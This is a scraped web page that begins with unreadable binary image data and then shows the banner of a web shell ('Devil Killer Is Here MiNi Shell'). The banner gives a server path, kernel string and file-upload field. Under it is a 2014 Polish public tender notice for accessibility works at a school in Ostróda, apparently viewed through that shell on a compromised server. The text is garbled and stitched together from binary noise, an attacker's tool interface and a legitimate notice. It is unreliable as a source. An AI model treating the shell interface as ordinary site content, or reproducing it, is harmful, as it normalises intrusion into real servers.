JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141202/249649-N-2014.html

<p class="kh_header"><b>Ostróda: Likwidacja barier architektonicznych w Zespole Szkół Zawodowych im. S. Petofi w Ostródzie - dostosowanie posadzek, wymiana drzwi zewnętrznych oraz wykonanie podjazdu dla osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 249649 - 2014; data zamieszczenia: 02.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ostródzki z siedzibą w Ostródzie , ul. Jana III Sobieskiego 5, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 089 6429800, faks 089 6429817.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.ostroda.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Likwidacja barier architektonicznych w Zespole Szkół Zawodowych im. S. Petofi w Ostródzie - dostosowanie posadzek, wymiana drzwi zewnętrznych oraz wykonanie podjazdu dla osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest likwidacja barier architektonicznych w Zespole Szkół Zawodowych im. S. Petofi w Ostródzie - dostosowanie posadzek, wymiana drzwi zewnętrznych oraz wykonanie podjazdu dla osób niepełnosprawnych, w zakresie:
1) Część 1 - Wymiana wykładzin podłogowych na ciągach komunikacyjnych, zgodnie z przedmiarem robót stanowiącym załącznik nr 4A do siwz, dokumentacją projektową stanowiącą załącznik nr 5 do siwz, specyfikacją techniczną wykonania i odbioru robót (STWiOR) stanowiącą załącznik nr 6A do siwz oraz projektem umowy stanowiącym załącznik nr 3A do siwz.
2) Część 2 - Przebudowa wejścia do szkoły, zgodnie z przedmiarem robót stanowiącym załącznik nr 4B do siwz, dokumentacją projektową stanowiącą załącznik nr 5 do siwz, specyfikacją techniczną wykonania i odbioru robót (STWiOR) stanowiącą załącznik nr 6B do siwz oraz projektem umowy stanowiącym załącznik nr 3B do siwz.
2. Zakres przedmiotu zamówienia w szczególności obejmuje: 
1) Część 1 - wykonanie robót budowlanych w zakresie: zerwania istniejących nawierzchni posadzek z tworzyw sztucznych - 925,00 m2, uzupełnienia posadzki cementowej -                              138,75 m2; wykonanie warstwy wyrównującej oraz ułożenie wykładzin homogenicznych                             z tworzyw sztucznych z warstwą izolacyjną, rulonowych - 1.017,50 m2.
2) Część 2 - wykonanie robót budowlanych w zakresie: robót rozbiórkowych wraz z wywozem gruzu; wykonania schodów żelbetowych - 2,75 m3 oraz płyty fundamentowej żelbetowej -  2,05 m3; wykonania podjazdu z kostki polbruk gr. 6 cm - 12,95 m2; montaż drzwi zewnętrznych aluminiowych dwuskrzydłowych oszklonych - 4,60 m2.                                                                                                                                                       
3. Przedmiot zamówienia obejmuje ponadto wykonanie wszelkich prac pomocniczych 
i towarzyszących niezbędnych do prawidłowej realizacji przedmiotu zamówienia, w szczególności:
a) załadunek, rozładunek oraz wywóz urządzeń pochodzących z demontażu i gruzu                            wraz z poddaniem ich utylizacji;
b) zabezpieczenie pomieszczeń, w których będą prowadzone roboty oraz pomieszczeń przyległych (teren budowy);
c) uporządkowanie i uprzątnięcie po zakończeniu robót pomieszczeń, w których prowadzone były roboty oraz sąsiednich pomieszczeń zanieczyszczonych w wyniku prowadzonych robót.
4. Inne postanowienia:
1) Wykonawca może złożyć ofertę na jedną wybraną  część lub na obydwie części objęte przedmiotem zamówienia.
2) Zamawiający, nie zastrzega na podstawie art. 36a ust. 2 pkt 1 ustawy Pzp, osobistego wykonania przez wykonawcę kluczowych części zamówienia.
3) Zamawiający nie wymaga przedkładania umów o podwykonawstwo, których przedmiotem są dostawy lub usługi o wartości mniejszej niż 0,5 % wartości umowy w sprawie zamówienia publicznego oraz umów o podwykonawstwo, których przedmiotem są dostawy materiałów i/lub urządzeń podlegających wbudowaniu w ramach niniejszego przedmiotu zamówienia oraz usługi transportowe. Postanowienie, o którym mowa w zdaniu pierwszym, nie dotyczy umów 
o podwykonawstwo o wartości większej niż 50.000,- zł brutto. 
4) Z uwagi na fakt, iż roboty będą prowadzone w obiekcie czynnym, wszelkie prace należy wykonywać w sposób niestwarzający zagrożenia dla osób przebywających w obiekcie. Sposób prowadzenia prac nie może wpływać na funkcjonowanie obiektu. W trakcie prowadzenia robót Wykonawca zobowiązany jest do zachowania estetyki i czystości.
5) Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent                       czy pochodzenie - należy przyjąć, że Zamawiający podał opis ze wskazaniem na typ                                 i dopuszcza składanie ofert równoważnych o parametrach techniczno - eksploatacyjno - użytkowych nie gorszych niż te, które zostały podane w opisie przedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 ustawy Pzp..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się możliwość udzielania zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnie z art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2013r. poz. 907 z późń. zm.).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.43.21.30-4, 45.21.47.10-0, 45.42.11.31-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części 1 i 2: Zamawiający nie ustalił szczegółowych warunków dotyczących posiadania uprawnień do wykonywania określonej działalności lub czynności. Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia                          w trybie art. 22 ust. 1 pkt 1 uPzp, o którym mowa w § 6 ust. 1 siwz (zał. nr 2 do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części 1 i 2: Zamawiający nie ustalił szczegółowych warunków dotyczących posiadania wiedzy i doświadczenia.Spełnianie warunku dotyczącego posiadania wiedzy i doświadczenia zostanie ocenione                      na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 2 uPzp, o którym mowa w § 6 ust. 1 siwz (zał. nr 2 do siwz. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części 1 i 2: Zamawiający nie ustalił szczegółowych warunków dotyczących dysponowania potencjałem technicznym. Spełnianie warunku dotyczącego dysponowania potencjałem technicznym  zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 3 uPzp, o którym mowa w § 6 ust. 1 siwz (zał. nr 2 do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art.24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części 1 i 2: Zamawiający nie określił szczegółowych warunków dotyczących dysponowania osobami zdolnymi do wykonania zamówienia. Spełnianie warunku dysponowania osobami zdolnymi do wykonania przedmiotu zamówienia zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia  w trybie art. 22 ust. 1 pkt 3 uPzp, o którym mowa w § 6 ust. 1 siwz (zał. nr 2 do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie                   art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy część 1 i 2: Zamawiający nie określił szczegółowych warunków dotyczących sytuacji ekonomicznej  i finansowej.Spełnianie warunku posiadania zdolności finansowej i ekonomicznej do wykonania zamówienia zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia  w trybie art. 22 ust. 1 pkt 4 uPzp, o którym mowa w § 6 ust. 1 siwz (zał. nr 2 do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz ofertowy adekwatny dla wybranej części (załącznik nr 1A i/lub 1B do siwz).
2) W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. Wzór pełnomocnictwa stanowi załącznik nr 7 do siwz. 
3) W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych                   z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania                       i złożenia oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. (Dotyczy części 1 i 2) Termin realizacji przedmiotu umowy może ulec zmianie w przypadku:
1) wystąpienia robót dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego;
2) wystąpienia warunków atmosferycznych lub klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia zgodnie z procesem technologicznym;
3) przestojów spowodowanych koniecznością usuwania uszkodzeń istniejących urządzeń, nieoznaczonych w dokumentacji projektowej;
4) wstrzymania realizacji robót budowlanych z przyczyn nie wynikających z winy Wykonawcy;
5) konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
6) pojawienia się na rynku materiałów lub urządzeń nowszej generacji pozwalających                              na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
7) konieczności zrealizowania robót przy zastosowaniu innych rozwiązań technicznych                                lub technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
8) opóźnień lub trudności związanych z finansowaniem przedmiotu umowy;
9) zaistnienia siły wyższej.
2. Pod pojęciem siły wyższej Strony rozumieją okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań w normalnych zakresie, nie mogą być przez Strony przewidziane oraz którym Strony nie mogą zapobiec, bądź się im przeciwstawić w sposób skuteczny. 
3. W przypadkach określonych w pkt 1, Strony ustalają nowy termin realizacji zamówienia.                       W przypadku zaistnienia przerwy lub przestoju w realizacji robót, okres przesunięcia terminu zakończenia zadania równy będzie okresowi przerwy lub przestoju.
4. Zmiany terminu realizacji przedmiotu zamówienia wynikające z przyczyn określonych w pkt 1, zostaną dokonane na podstawie pisemnego uzasadnienia zmian zatwierdzonego przez Strony oraz wymagają aneksu w formie pisemnej pod rygorem nieważności. Zmiany terminu realizacji przedmiotu umowy mogą być wprowadzone jedynie w przypadku zgodnego uznania przez Strony, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia.
5. (Dotyczy części 1 i 2) Zmiana osoby, wskazanej jako odpowiedzialnej z ramienia wykonawcy za prawidłową realizację przedmiotu zamówienia w trakcie realizacji przedmiotu niniejszej umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. 
6. (Dotyczy części 1 i 2) Zmiana osoby wskazanej na kierownika budowy, może nastąpić wyłącznie na zasadach i w trybie określonym w ustawie z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2013r. poz. 1409 z późn. zm.), z zastrzeżeniem pkt 7 - 11.
7. Zmiana osoby, wskazanej na kierownika budowy w trakcie realizacji przedmiotu niniejszej umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji i wyłącznie wtedy, gdy kwalifikacje wskazanej osoby będą takie same lub wyższe od kwalifikacji posiadanych przez osobę pierwotnie wskazaną na kierownika budowy. 
8. Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, o której mowa w pkt 7, nie później niż 7 dni przed planowanym skierowaniem do kierowania budową innej osoby. Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z braku kierownika budowy będzie traktowana jako przerwa wynikająca z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót, z zastrzeżeniem postanowień pkt 9.
9. Postanowienia pkt 8 nie dotyczą sytuacji losowych, np. niezdolności do pracy lub śmierci osoby wskazanej pierwotnie na kierownika budowy.
10. Skierowanie, bez akceptacji Zamawiającego, do kierowania budową innej osoby niż pierwotnie wskazana, może stanowić podstawę do rozwiązania umowy z winy Wykonawcy.
11. Zaakceptowana przez Zamawiającego zmiana osoby pierwotnie wskazanej na kierownika budowy, winna być dokonana wpisem do dziennika budowy i nie wymaga aneksu do niniejszej umowy.
12. (Dotyczy części 1 i 2) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. 
13. Zamawiający nie zastrzega na podstawie art. 36a ust. 2 pkt 1 ustawy Pzp obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
14. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_ostrodzki/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Ostródzki z siedzibą w Ostródzie 14 - 100 Ostróda, ul., Jana III Sobieskiego 5, Biuro Zamówień Publicznych (pok. 418).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2014 godzina 10:00, miejsce: Powiat Ostródzki z siedzibą w Ostródzie, 14-100 Ostróda, ul. Jana III Sobieskiego 5, pokój 218 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
2. Oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną, z zastrzeżeniem wyjątków określonych w uPzp,                          dla których bezwzględnie wymagana jest forma pisemna.
3.Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia                             oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek 
o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, 
tj. do dnia  09.12.2014r.
5. Jeżeli wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął po upływie terminu składania wniosków, o którym mowa w ust. 4, lub dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień, albo pozostawić wniosek bez rozpatrzenia.
6. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa w pkt 5.
7. Zamawiający jednocześnie przekaże treść zapytań wraz z wyjaśnieniami wszystkim wykonawcom, którym przekazano siwz, bez ujawniania źródła zapytania oraz zamieszcza ich treść na stronie internetowej http://bip.warmia.mazury.pl/powiat_ostrodzki/.
8. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest przedstawić Zamawiającemu umowę regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta wybrana jako najkorzystniejsza została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
9. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Wymiana wykładzin podłogowych na ciągach komunikacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - Wymiana wykładzin podłogowych na ciągach komunikacyjnych, zgodnie z przedmiarem robót stanowiącym załącznik nr 4A do siwz, dokumentacją projektową stanowiącą załącznik nr 5 do siwz, specyfikacją techniczną wykonania i odbioru robót (STWiOR) stanowiącą załącznik nr 6A do siwz oraz projektem umowy stanowiącym załącznik nr 3A do siwz.
